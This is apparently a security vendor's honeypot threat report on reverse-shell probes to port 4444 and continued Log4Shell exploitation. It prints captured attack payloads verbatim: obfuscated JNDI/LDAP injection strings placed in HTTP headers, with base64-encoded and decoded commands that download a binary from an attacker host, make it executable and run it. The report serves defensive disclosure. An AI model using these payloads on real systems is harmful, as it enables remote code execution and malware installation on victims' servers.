Summary
Attempts to exploit communication via reverse shell on port 4444
This week, in the TOP 10 of IP addresses launching malicious activities on TEHTRIS honeypots network, we find the two following IP addresses:
- 212.2.236[.]244 – AS 62164 (Heymman Servers Corporation) – US
- 23.140.88[.]145 – AS 62164 (Heymman Servers Corporation) – US
These two IP addresses are infamously known from public databases. They have performed 1 275 attempts in one morning on the 19th of October 2022 across Europe but targeted mostly German, Lithuanian and Finnish infrastructures.
45.85.219[.]125:4444
It starts a call towards the IP address 45.85.219[.]125 localized in Germany (hosted by AS 44486 SYNLINQ) unknown from public databases using port 4444.
The 4444 port (TCP & UDP) is known for being utilized by Trojans and malwares in general because it is used by the very effective Metasploit reverse shell tool. It is recommended to block incoming traffic towards this port.
Log4shell still actively exploited
It is the vulnerability CVE-2021-44228 (CVSS3 : 10), also known as Log4shell, which allows the threat actor to remotely execute a code (RCE). This particularly critical vulnerability concerns Apache Log4j : a software used to manage logs in Java. Log4j is useful to record and collect events happening in applications written in Java. For example, to register all requests sent to a website. The threat actor has the possibility to look for variables and content to display it. The flaw is not directly exploitable, as the threat actor must call a C2 server to download a code.
t('${${env:BARFOO:-j}ndi${env:BARFOO:-:}
${env:BARFOO:-l}dap${env:BARFOO:-:}//168.138.128[.]171:1389
/TomcatBypass/Command/Base64
/d2dldCBodHRwOi8vMTY4LjEzOC4xMjguMTcxL3Jpb3Qvb3BlbnZwbjsgY3VybCAtTyBodHRwOi8vMTY4LjEzOC4xMjguMTcxL3Jpb3Qvb3BlbnZwbjsgY2htb2QgNzc3IG9wZW52cG47IC4vb3BlbnZwbiBydW5uZXI=}')
wget hxxp[://]168[.]138[.]128[.]171/riot/openvpn;
curl -O hxxp[://]168[.]138[.]128[.]171/riot/openvpn;
chmod 777 openvpn; ./openvpn runner)
["x-api-version: t(\\'${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//168.138.128[.]171:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTY4LjEzOC4xMjguMTcxL3BlcmwvaWRzaGExZ2FtZTsgY3VybCAtTyBodHRwOi8vMTY4LjEzOC4xMjguMTcxL3BlcmwvaWRzaGExZ2FtZTsgY2htb2QgNzc3IGlkc2hhMWdhbWU7IC4vaWRzaGExZ2FtZSBydW5uZXI=}\\')",
"bearer: t(\\'${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//168.138.128[.]171:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTY4LjEzOC4xMjguMTcxL3BlcmwvaWRzaGExZ2FtZTsgY3VybCAtTyBodHRwOi8vMTY4LjEzOC4xMjguMTcxL3BlcmwvaWRzaGExZ2FtZTsgY2htb2QgNzc3IGlkc2hhMWdhbWU7IC4vaWRzaGExZ2FtZSBydW5uZXI=}\\')",
"x-client-ip: t(\\'${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//168.138.128[.]171:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTY4LjEzOC4xMjguMTcxL3BlcmwvaWRzaGExZ2FtZTsgY3VybCAtTyBodHRwOi8vMTY4LjEzOC4xMjguMTcxL3BlcmwvaWRzaGExZ2FtZTsgY2htb2QgNzc3IGlkc2hhMWdhbWU7IC4vaWRzaGExZ2FtZSBydW5uZXI=}\\')",
'connection: close',
"cf-connecting_ip: t(\\'${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//168.138.128[.]171:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTY4LjEzOC4xMjguMTcxL3BlcmwvaWRzaGExZ2FtZTsgY3VybCAtTyBodHRwOi8vMTY4LjEzOC4xMjguMTcxL3BlcmwvaWRzaGExZ2FtZTsgY2htb2QgNzc3IGlkc2hhMWdhbWU7IC4vaWRzaGExZ2FtZSBydW5uZXI=}\\')",
'accept: application/json, text/plain, */*',
"authentication: t(\\'${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//168.138.128[.]171:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTY4LjEzOC4xMjguMTcxL3BlcmwvaWRzaGExZ2FtZTsgY3VybCAtTyBodHRwOi8vMTY4LjEzOC4xMjguMTcxL3BlcmwvaWRzaGExZ2FtZTsgY2htb2QgNzc3IGlkc2hhMWdhbWU7IC4vaWRzaGExZ2FtZSBydW5uZXI=}\\')",
"originating-ip: t(\\'${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//168.138.128[.]171:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTY4LjEzOC4xMjguMTcxL3BlcmwvaWRzaGExZ2FtZTsgY3VybCAtTyBodHRwOi8vMTY4LjEzOC4xMjguMTcxL3BlcmwvaWRzaGExZ2FtZTsgY2htb2QgNzc3IGlkc2hhMWdhbWU7IC4vaWRzaGExZ2FtZSBydW5uZXI=}\\')",
"x-real-ip: t(\\'${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//168.138.128[.]171:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTY4LjEzOC4xMjguMTcxL3BlcmwvaWRzaGExZ2FtZTsgY3VybCAtTyBodHRwOi8vMTY4LjEzOC4xMjguMTcxL3BlcmwvaWRzaGExZ2FtZTsgY2htb2QgNzc3IGlkc2hhMWdhbWU7IC4vaWRzaGExZ2FtZSBydW5uZXI=}\\')"]
Here, the attacker tried several ways to exploit the vulnerability.
Here 2 other examples of known requests that try to exploit this CVE :
${jndi:ldap[:]//127.0.0.1[:]389/5j9gclyhuddf8k1712mm0mkwn8kb3h6u/${java:os}/${sys:java.vendor}_${sys:java.version}}
${jndi:ldap[:]//168.138.128.171[:]1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTY4LjEzOC4xMjguMTcxL3BlcmwvaWRzaGExZ2FtZTsgY3VybCAtTyBodHRwOi8vMTY4LjEzOC4xMjguMTcxL3BlcmwvaWRzaGExZ2FtZTsgY2htb2QgNzc3IGlkc2hhMWdhbWU7IC4vaWRzaGExZ2FtZSBydW5uZXI=}
wget http[:]//168.138.128.171/perl/idsha1game;
curl -O http[:]//168.138.128.171/perl/idsha1game;
chmod 777 idsha1game; ./idsha1game runner
To go further with the French National Cybersecurity Agency ANSSI : https://www.cert.ssi.gouv.fr/alerte/CERTFR-2021-ALE-022/
This CVE made a lot of noise since its discovery at the end of 2021 and is still actively exploited one year later.
TEHTRIS recommends that you always apply updates as soon as they become available.